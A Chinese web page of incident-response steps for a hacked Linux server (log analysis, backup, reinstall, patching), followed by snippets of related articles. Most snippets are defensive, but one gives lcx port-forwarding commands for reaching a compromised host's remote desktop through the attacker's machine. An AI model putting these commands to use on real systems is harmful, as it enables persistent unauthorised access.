公司服务器被黑客入侵后你要如何处理?

第一步:断网,无线和有线的都要断开

第二步:分析登录文件信息,搜索可能侵入的途径

 被入侵后,决不是重新安装就可以了,还要分析主机被入侵的原因和途径,如果找出了问题点,就可能使您的主机以后更安全,同时也提高了自己的Linux水平。

  如果不知道如何找出入侵途径,下次还有可能发生同样的事。一般:

  (1)、分析登录文件:可以通过分析一些主要的登录文件找到对方的IP以及可能出现的漏洞。一般分析的文件为:/var/log/messages和/var/log/secure文件。还可以使用last命令找出最后一个登录者的信息。

  (2)、检查主机开放的服务:很多Linux管理员不知道自己的主机上开放了多少服务,每个服务都有漏洞或不该启动的增强型或测试型功能。找出系统上的服务,逐个检查服务是否有漏洞或设置上的失误。

  (3)、重要数据备份

  所谓重要的数据就是非Linux上的原有数据。如/etc/passwd,/etc/shadow,WWW网页的数据,/home里的用户文件,至于/etc/*,/usr/,/var等目录下的数据就不要备份了。

  (4)、系统重装

  重要的是选择合适的包,不要将所有的包都安装。

  (5)、包漏洞修补

  安装后,要立即更新系统包,更新后再设置防火墙机制,同时关闭一些不必要的服务,最后才插上网线。

  (6)、关闭或卸载不需要的服务

  启动的服务越少,系统入侵的可能性就越底。

  (7)、数据恢复与恢复服务设置

  备份的数据要复制回系统,然后将提供的服务再次开放。

  (8)、将主机开放到网络上

及时的处理服务器被入侵问题,虽说是亡羊补牢,但能最大程度的减小损失,避免给公司业务造成更大的影响。

时间: 2024-08-08 22:08:53

公司服务器被黑客入侵后你要如何处理?的相关文章

使用的阿里云服务器被黑客入侵怎么办

对于很多运维人员来说,服务器安全是至关重要的,必须确保云服务器上的网站不被恶意入侵以及安装木马病毒程序.现在很多公司以及个人习惯使用云服务器,如阿里云.腾讯云.百度云等,当云服务器被黑客入侵的时候,排查的相关方法依旧跟自建服务器类似.如果使用的是阿里云服务器,在网站等应用程序被挂马蠕虫或者服务器被入侵,但自身运维工作人员又无法排查出问题的时候,我们还可以通过购买阿里云的安全应急响应服务来请阿里的安全应急专家帮助我们运维人员排查. 自身运维人员排查涉及的方面如下,具体不详细阐述: (1)查看日志信

黑客入侵后端口转发利器lcx,开启3389旅途

lcx可以将内网端口映射到本机,缺点是需要本地电脑拥有外网IP,不然在某些情况lcx就无用武之地了.与之相比,reDuh更加优秀,后续会讲到. lcx只有3中命令,常用的有2种. 首先在肉鸡上lcx.exe -slave 本机IP PORT1 肉鸡IP 3389 然后本地执行  lcx.exe -listen PORT1 PORT2: 登陆远程桌面 输入127.0.0.1:PORT2,即可登陆到肉鸡的桌面. 在肉鸡3389开启的情况下,webshell提权中也常用lcx进行内网转发.

服务器被入侵后的故障检测思路

下面通过一个案例介绍下当一个服务器被rootkit入侵后的处理思路和处理过程,rootkit攻击是Linux系统下最常见的攻击手段和攻击方式. 1.受攻击案例描述 这是一台客户的门户网站服务器,托管在电信机房,客户接到电信的通知:由于此服务器持续对外发送数据包,导致100M带宽耗尽,于是电信就切断了此服务器的网络.此服务器是Centos5.5版本,对外开放了80.22端口. 从客户那里了解到,网站的访问量并不大,所以带宽占用也不会太高,而耗尽100M的带宽是绝对不可能的,那么极有可能是服务器遭受

Linux主机被入侵后的处理案例

一次Linux被入侵后的分析 下面通过一个案例介绍下当一个服务器被rootkit入侵后的处理思路和处理过程,rootkit攻击是Linux系统下最常见的攻击手段和攻击方式. 1.受攻击现象 这是一台客户的门户网站服务器,托管在电信机房,客户接到电信的通知:由于此服务器持续对外发送数据包,导致100M带宽耗尽,于是电信就切断了此服务器的网络.此服务器是Centos5.5版本,对外开放了80.22端口.从客户那里了解到,网站的访问量并不大,所以带宽占用也不会太高,而耗尽100M的带宽是绝对不可能的,

工程师入侵公司服务器 窃取企业用户通讯录被公诉

为了炫耀自己的计算机技术,网络工程师孙某利用北京某通信有限公司计算机系统存在的网络漏洞,入侵该公司的服务器,窃取其企业用户通讯录16000余组.日前,孙某因涉嫌非法获取计算机信息系统数据罪被昌平检察院提起公诉. 意外发现网络漏洞 孙某毕业于北京某大学的计算机科学与技术专业,是安全测试工程师.因为孙某所在公司是北京某通信有限公司的用户,作为公司网络安全工程师的孙某经常会同该公司发生业务往来,时间长了,孙某发现该通信公司的网络系统存在漏洞.出于好奇,同时也是为了考验自己的"业务水平",孙某

防御黑客入侵的小妙招

冒名的购物网站也非常多,据统计显示钓鱼网站一年钓走网民的损失达到76亿.网上的一些虚假宣传也非常多,哈尔滨消协人士接到的投诉就达到375件这样的形势妨碍互联网发展的. 网络安全问题,成为中小站长迫切需要警惕的事情.那么如何让自己的网站不被黑客入侵呢?怎样保护网络安全呢? 下面跟大家分享一下抵御黑客入侵的小妙招: 防火墙,检查,再检查 最后一个技巧是仔细检查防火墙的设置.防火墙是网络规划中很重要的一部份,因为它能使公司电脑不受外界恶意破坏. 首先,不要公布非必要的IP地址.你至少要有一个对外的IP

Linux 如何判断自己的服务器是否被入侵

如何判断自己的服务器是否被入侵了呢?仅仅靠两只手是不够的,但两只手也能起到一些作用,我们先来看看UNIX系统上一些入侵检测方法,以LINUX和solaris为例. 1.检查系统密码文件 首先从明显的入手,查看一下passwd文件,ls –l /etc/passwd查看文件修改的日期. 检查一下passwd文件中有哪些特权用户,系统中uid为0的用户都会被显示出来. awk –F:’$3==0 {print $1}’ /etc/passwd 顺便再检查一下系统里有没有空口令帐户: awk –F:

[转]黑客入侵应急分析手工排查

0x00 事件分类 常见的安全事件: Web入侵:挂马.篡改.Webshell 系统入侵:系统异常.RDP爆破.SSH爆破.主机漏洞 病毒木马:远控.后门.勒索软件 信息泄漏:拖裤.数据库登录(弱口令) 网络流量:频繁发包.批量请求.DDOS攻击 0x01 排查思路 一个常规的入侵事件后的系统排查思路: 文件分析?a) 文件日期.新增文件.可疑/异常文件.最近使用文件.浏览器下载文件?b) Webshell 排查与分析?c) 核心应用关联目录文件分析 进程分析a) 当前活动进程 & 远程连接?b

公司服务器备份

服务器备份简单定义 所谓服务器备份是指针对于服务器所产生的数据信息进行相应的存储备份过程,从而保障数据的安全运行.公司服务器的备份应对当前和将来的信息使用方式进行评估,实施满足其全部需求的流程和技术. 公司服务器备份简单来说就是为了保证数据不丢失,在灾难来临能及时恢复数据并保证企业业务得以继续开展.备份是容灾的基础,当系统出现操作失误或系统故障.人为错误操作.病毒攻击.黑客攻击以及自然灾害导致数据丢失,而将备份的全部或部分数据进行恢复. 公司服务器传统备份方法 一.内置或外置的磁带机进行冷备份;